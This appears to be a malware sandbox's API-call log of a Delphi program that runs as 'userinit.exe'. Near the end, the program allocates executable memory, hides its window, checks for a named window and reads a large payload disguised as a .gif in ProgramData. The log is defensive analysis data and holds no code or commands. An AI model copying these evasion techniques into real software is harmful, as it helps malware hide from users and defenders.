[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Friday") returned 7
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Sat") returned 4
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x16f5f0, cchData=256 | out: lpLCData="Saturday") returned 9
[0117.548] GetThreadLocale () returned 0x409
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x16f64c, cchData=256 | out: lpLCData="$") returned 2
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x16f64c, cchData=256 | out: lpLCData="0") returned 2
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x16f64c, cchData=256 | out: lpLCData="0") returned 2
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x16f744, cchData=2 | out: lpLCData=",") returned 2
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x16f744, cchData=2 | out: lpLCData=".") returned 2
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x16f64c, cchData=256 | out: lpLCData="2") returned 2
[0117.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x16f744, cchData=2 | out: lpLCData="/") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x16f64c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0117.549] GetThreadLocale () returned 0x409
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x16f618, cchData=256 | out: lpLCData="1") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x16f64c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0117.549] GetThreadLocale () returned 0x409
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x16f618, cchData=256 | out: lpLCData="1") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x16f744, cchData=2 | out: lpLCData=":") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x16f64c, cchData=256 | out: lpLCData="AM") returned 3
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x16f64c, cchData=256 | out: lpLCData="PM") returned 3
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x16f64c, cchData=256 | out: lpLCData="0") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x16f64c, cchData=256 | out: lpLCData="0") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x16f64c, cchData=256 | out: lpLCData="0") returned 2
[0117.549] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x16f744, cchData=2 | out: lpLCData=",") returned 2
[0117.549] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0117.549] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0117.550] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0117.550] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0117.550] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0117.550] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0117.551] GetDC (hWnd=0x0) returned 0x16010853
[0117.551] GetDeviceCaps (hdc=0x16010853, index=90) returned 96
[0117.551] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0117.551] GetDC (hWnd=0x0) returned 0x16010853
[0117.551] GetDeviceCaps (hdc=0x16010853, index=104) returned 0
[0117.551] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0117.551] CreatePalette (plpal=0x16f3a8) returned 0xb080874
[0117.551] GetStockObject (i=7) returned 0x1b00017
[0117.551] GetStockObject (i=5) returned 0x1900015
[0117.551] GetStockObject (i=13) returned 0x18a002e
[0117.551] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0117.551] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0117.551] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0117.551] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0117.552] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0117.553] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x16f3a4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0117.553] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0117.553] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0117.553] GetVersion () returned 0x1db10106
[0117.553] GetCurrentProcessId () returned 0xfd0
[0117.553] GlobalAddAtomA (lpString="Delphi00000FD0") returned 0xc139
[0117.553] GetCurrentThreadId () returned 0xfd4
[0117.553] GlobalAddAtomA (lpString="ControlOfs0040000000000FD4") returned 0xc138
[0117.554] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000FD4") returned 0xc16d
[0117.554] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0117.554] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0117.554] GetSystemMetrics (nIndex=19) returned 1
[0117.606] GetSystemMetrics (nIndex=75) returned 1
[0117.606] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x4c1310, fWinIni=0x0 | out: pvParam=0x4c1310) returned 1
[0117.607] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0117.607] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0117.607] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x401b1
[0117.607] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0117.607] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0117.607] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0117.607] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x401af
[0117.607] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x401f9
[0117.607] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x401cb
[0117.608] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x401cd
[0117.608] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x4021d
[0117.608] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x40221
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0117.608] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0117.608] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0117.608] GetDC (hWnd=0x0) returned 0x16010853
[0117.608] GetDeviceCaps (hdc=0x16010853, index=90) returned 96
[0117.608] ReleaseDC (hWnd=0x0, hDC=0x16010853) returned 1
[0117.609] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0117.609] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x4c155c) returned 1
[0117.609] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x16f70f, fWinIni=0x0 | out: pvParam=0x16f70f) returned 1
[0117.609] CreateFontIndirectA (lplf=0x16f70f) returned 0x460a085e
[0117.609] GetObjectA (in: h=0x460a085e, c=60, pv=0x16f500 | out: pv=0x16f500) returned 60
[0117.609] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x16f5bb, fWinIni=0x0 | out: pvParam=0x16f5bb) returned 1
[0117.609] CreateFontIndirectA (lplf=0x16f697) returned 0x120a0873
[0117.609] GetObjectA (in: h=0x120a0873, c=60, pv=0x16f500 | out: pv=0x16f500) returned 60
[0117.609] CreateFontIndirectA (lplf=0x16f65b) returned 0x140a085d
[0117.609] GetObjectA (in: h=0x140a085d, c=60, pv=0x16f500 | out: pv=0x16f500) returned 60
[0117.609] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0117.610] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x16f66f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0117.610] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x16f66f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0117.610] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0117.610] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x16f624 | out: lpWndClass=0x16f624) returned 0
[0117.610] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0117.610] GetSystemMetrics (nIndex=0) returned 1440
[0117.610] GetSystemMetrics (nIndex=1) returned 900
[0117.610] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x401e0
[0117.614] SetWindowLongA (hWnd=0x401e0, nIndex=-4, dwNewLong=856047) returned 4219500
[0117.614] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0117.614] SendMessageA (hWnd=0x401e0, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0117.614] DefWindowProcA (hWnd=0x401e0, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0117.625] DefWindowProcA (hWnd=0x401e0, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x4020d
[0117.626] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0117.626] SetClassLongA (hWnd=0x401e0, nIndex=-14, dwNewLong=65575) returned 0x0
[0117.626] GetSystemMenu (hWnd=0x401e0, bRevert=0) returned 0x50229
[0117.628] DeleteMenu (hMenu=0x50229, uPosition=0xf030, uFlags=0x0) returned 1
[0117.628] DeleteMenu (hMenu=0x50229, uPosition=0xf000, uFlags=0x0) returned 1
[0117.628] DeleteMenu (hMenu=0x50229, uPosition=0xf010, uFlags=0x0) returned 1
[0117.628] GetKeyboardLayoutList (in: nBuff=64, lpList=0x16f5f0 | out: lpList=0x16f5f0) returned 1
[0117.629] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0117.629] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0117.630] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0117.630] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0117.631] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0117.631] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0117.631] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0117.631] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0117.631] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0117.631] GetCurrentThreadId () returned 0xfd4
[0117.631] GlobalAddAtomA (lpString="WndProcPtr0040000000000FD4") returned 0xc137
[0117.631] VirtualAlloc (lpAddress=0x4c4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c4000
[0117.631] ShowWindow (hWnd=0x401e0, nCmdShow=0) returned 0
[0117.631] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0117.632] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0117.632] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x16f370*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x16f370*=0) returned 0x0
[0117.632] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x16f368*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x16f368*=0) returned 0x0
[0117.632] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x16f368*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x16f368*=0) returned 0x10be00
[0117.632] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x16f368*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x16f368*=0) returned 0x0
[0117.632] GlobalLock (hMem=0x620004) returned 0x23c0020
[0117.632] ReadFile (in: hFile=0x98, lpBuffer=0x23c0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x16f384, lpOverlapped=0x0 | out: lpBuffer=0x23c0020*, lpNumberOfBytesRead=0x16f384*=0x10be00, lpOverlapped=0x0) returned 1
[0117.704] CloseHandle (hObject=0x98) returned 1
[0117.704] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.705] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.705] GlobalUnlock (hMem=0x62000c) returned 0
[0117.705] GlobalReAlloc (hMem=0x62000c, dwBytes=0x4000, uFlags=0x2) returned 0x62000c
[0117.705] GlobalLock (hMem=0x62000c) returned 0x6b6810
[0117.706] GlobalHandle (pMem=0x6b6810) returned 0x62000c
[0117.706] GlobalUnlock (hMem=0x62000c) returned 0
[0117.706] GlobalReAlloc (hMem=0x62000c, dwBytes=0x6000, uFlags=0x2) returned 0x62000c
[0117.706] GlobalLock (hMem=0x62000c) returned 0x6ba820
[0117.707] GlobalHandle (pMem=0x6ba820) returned 0x62000c
[0117.707] GlobalUnlock (hMem=0x62000c) returned 0
[0117.707] GlobalReAlloc (hMem=0x62000c, dwBytes=0x8000, uFlags=0x2) returned 0x62000c
[0117.708] GlobalLock (hMem=0x62000c) returned 0x6c0830
[0117.708] GlobalHandle (pMem=0x6c0830) returned 0x62000c
[0117.708] GlobalUnlock (hMem=0x62000c) returned 0
[0117.708] GlobalReAlloc (hMem=0x62000c, dwBytes=0xa000, uFlags=0x2) returned 0x62000c
[0117.708] GlobalLock (hMem=0x62000c) returned 0x6c0830
[0117.709] GlobalHandle (pMem=0x6c0830) returned 0x62000c
[0117.709] GlobalUnlock (hMem=0x62000c) returned 0
[0117.709] GlobalReAlloc (hMem=0x62000c, dwBytes=0xc000, uFlags=0x2) returned 0x62000c
[0117.710] GlobalLock (hMem=0x62000c) returned 0x6ca840
[0117.711] GlobalHandle (pMem=0x6ca840) returned 0x62000c
[0117.711] GlobalUnlock (hMem=0x62000c) returned 0
[0117.711] GlobalReAlloc (hMem=0x62000c, dwBytes=0xe000, uFlags=0x2) returned 0x62000c
